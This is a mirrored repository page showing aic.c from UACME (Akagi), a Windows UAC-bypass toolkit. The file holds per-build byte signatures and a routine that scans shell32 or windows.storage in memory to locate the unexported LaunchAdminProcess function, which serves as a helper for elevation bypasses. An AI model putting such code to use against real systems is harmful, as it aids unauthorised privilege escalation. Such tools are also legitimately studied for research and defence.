Rooba
/
UACME
mirror of https://github.com/hfiref0x/UACME.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity
UACME/Source/Akagi/aic.c

134 lines
4.0 KiB
C
Raw Blame History

/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017 - 2018
*
* TITLE: AIC.C
*
* VERSION: 2.87
*
* DATE: 17 Apr 2018
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
unsigned char LaunchAdminProcessSignature760x[] = {
0xFF, 0xF3, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81,
0xEC, 0x30, 0x04, 0x00, 0x00
};
unsigned char LaunchAdminProcessSignature9200[] = {
0x44, 0x89, 0x44, 0x24, 0x18, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56,
0x41, 0x57, 0x48, 0x81, 0xEC, 0xF0, 0x03, 0x00, 0x00
};
unsigned char LaunchAdminProcessSignature9600[] = {
0x44, 0x89, 0x4C, 0x24, 0x20, 0x44, 0x89, 0x44, 0x24, 0x18, 0x53, 0x56, 0x57, 0x41,
0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xEC, 0x00, 0x04, 0x00, 0x00
};
unsigned char LaunchAdminProcessSignature10240_10586[] = {
0x40, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81,
0xEC, 0x30, 0x04, 0x00, 0x00
};
unsigned char LaunchAdminProcessSignature14393[] = {
0x40, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81,
0xEC, 0x20, 0x04, 0x00, 0x00
};
unsigned char LaunchAdminProcessSignature_15063_17134[] = {
0x40, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81,
0xEC, 0x20, 0x04, 0x00, 0x00
};
/*
* AipFindLaunchAdminProcess
*
* Purpose:
*
* Locate unexported AppInfo routine in memory by signature.
*
*/
ULONG_PTR AipFindLaunchAdminProcess(
_In_ PULONG ErrorCode)
{
ULONG_PTR Address = 0;
PBYTE Pattern = NULL, ScanBase = NULL;
DWORD PatternSize = 0, ScanSize = 0;
IMAGE_NT_HEADERS *NtHeaders;
LPWSTR ScanModule = NULL;
switch (g_ctx.dwBuildNumber) {
case 7600:
case 7601:
Pattern = LaunchAdminProcessSignature760x;
PatternSize = sizeof(LaunchAdminProcessSignature760x);
ScanModule = SHELL32_DLL;
break;
case 9200:
Pattern = LaunchAdminProcessSignature9200;
PatternSize = sizeof(LaunchAdminProcessSignature9200);
ScanModule = SHELL32_DLL;
break;
case 9600:
Pattern = LaunchAdminProcessSignature9600;
PatternSize = sizeof(LaunchAdminProcessSignature9600);
ScanModule = SHELL32_DLL;
break;
case 10240:
case 10586:
Pattern = LaunchAdminProcessSignature10240_10586;
PatternSize = sizeof(LaunchAdminProcessSignature10240_10586);
ScanModule = WINDOWS_STORAGE_DLL;
break;
case 14393:
Pattern = LaunchAdminProcessSignature14393;
PatternSize = sizeof(LaunchAdminProcessSignature14393);
ScanModule = WINDOWS_STORAGE_DLL;
break;
case 15063:
case 16299:
case 17134:
default:
Pattern = LaunchAdminProcessSignature_15063_17134;
PatternSize = sizeof(LaunchAdminProcessSignature_15063_17134);
ScanModule = WINDOWS_STORAGE_DLL;
break;
}
ScanBase = (PBYTE)GetModuleHandle(ScanModule);
if (ScanBase == NULL) {
ScanBase = (PBYTE)LoadLibraryEx(ScanModule, NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
}
if (ScanBase == NULL) {
*ErrorCode = ERROR_INTERNAL_ERROR;
return 0;
}
NtHeaders = RtlImageNtHeader(ScanBase);
if (NtHeaders->OptionalHeader.SizeOfImage <= PatternSize) {
*ErrorCode = ERROR_INTERNAL_ERROR;
return 0;
}
ScanSize = NtHeaders->OptionalHeader.SizeOfImage - PatternSize;
Address = (ULONG_PTR)supFindPattern(ScanBase, (SIZE_T)ScanSize, Pattern, (SIZE_T)PatternSize);
if (Address == 0) {
*ErrorCode = ERROR_PROC_NOT_FOUND;
return 0;
}
*ErrorCode = ERROR_SUCCESS;
return Address;
}
Reference in New Issue View Git Blame Copy Permalink